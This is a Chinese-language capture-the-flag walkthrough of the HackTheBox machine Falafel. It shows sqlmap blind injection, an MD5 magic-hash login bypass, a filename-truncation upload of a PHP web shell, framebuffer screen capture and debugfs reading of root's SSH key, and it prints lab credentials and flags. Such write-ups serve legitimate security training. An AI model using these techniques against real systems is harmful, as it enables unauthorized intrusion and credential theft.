[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MCollider(MD5枚举)+/dev/fb0帧缓冲器+debugfs权限提升

信息收集

IP AddressOpening Ports
10.10.10.73TCP:22,80

$ nmap -p- 10.10.10.73 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
|   256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_  256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/*.txt
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP && SQLMAP 登入页面盲注

http://10.10.10.73/

image.png

image-1.png

username=admin’ and ‘1’=‘1’–+&password=

image-6.png

username=admin’ and ‘1’=‘2’–+&password=

image-7.png

为了测试盲注入,我们可以在页面上查找根据我们的输入而变化的输出。我们知道,当用户名不存在时,用户名字段会显示“重试”,而当用户名存在时,用户名字段会显示“错误标识:admin”。如果查看sqlmap的手册页,–string选项显示“-string=STRING当查询被评估为True时匹配的字符串”。还有一个–not-string,表示查询为false。

image-2.png

image-3.png

$ sqlmap -r sql --level 5 --risk 3 --batch --string "Wrong identification"

image-4.png

$ sqlmap -r sql --level 5 --risk 3 --batch --string "Wrong identification" --dump

image-5.png

username:chris password:juggling

https://github.com/MartinxMax/MCollider

爆破admin用户md5值

$ python3 MCollider.py -md5 0e4620

image-15.png

[00:57:39][WARNING] -> 240610708 is contained by MD5:0e462097431906509019562988736854

使用密码登录管理员账户

image-16.png

文件截断

image-17.png

当我们上传一个png链接时会被保存在目录uploads/0909-0757_e7753937572b0b96中

image-18.png

http://10.10.16.17/test.php

image-19.png

根据用户的配置文件提示,跟长度有关

$ touch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png

http://10.10.16.17/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png

提示总长度为241字节,已超出限制

image-20.png

并且后缀.png丢失

image-21.png

http://10.10.16.17/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png

image-22.png

$ cp p0wny.php AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png

http://10.10.16.17/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png

image-23.png

http://10.10.10.73/uploads/0909-0811_ea7487f48ad80ceb/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php

image-24.png

www-data@falafel:/tmp$ cat /var/www/html/connection.php

image-25.png

username:moshe password:falafelIsReallyTasty

www-data@falafel:/tmp$ su moshe

image-26.png

User.txt

2b430278d922c8141b444ce36292e7f2

权限提升

moshe -> yossi

moshe@falafel:/tmp$ w

用户yossi已登入当前主机

image-27.png

/dev/fb0 是一个字符设备文件,代表第一个帧缓冲设备(framebuffer device)。帧缓冲是用于图形显示的一种机制,它允许程序直接操作显示屏的内存区域,从而实现图形输出。

image-28.png

moshe@falafel:/tmp$ cat /dev/fb0 > /tmp/screenshot.raw

要查看此文件,我们还需要屏幕分辨率,可以在/sys/class/graphics/fb0/中找到:

moshe@falafel:/tmp$ cat /sys/class/graphics/fb0/virtual_size

image-29.png

$ scp moshe@10.10.10.73:/tmp/screenshot.raw /tmp/

image-30.png

使用GIMP打开raw文件并且设置分辨率1176,885
然后将其导出为png

image-32.png

username:yossi password:MoshePlzStopHackingMe!

image-33.png

SDA

yossi@falafel:/tmp$ df

image-34.png

查找系统中块设备信息

yossi@falafel:~$ blkid

image-35.png

sda1是主磁盘,sda2是交换磁盘

使用debugfs命令以交互方式检查和修改文件系统的内部结构

yossi@falafel:~$ debugfs /dev/sda1

debugfs: cat /root/root.txt

Root持久化

debugfs: cat /root/.ssh/id_rsa

image-36.png

$ chmod 600 ./id_rsa

$ ssh -i /tmp/id_rsa root@10.10.10.73

image-37.png

Root.txt

1f0167a6445788cc5c03f8ac93b82f71

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值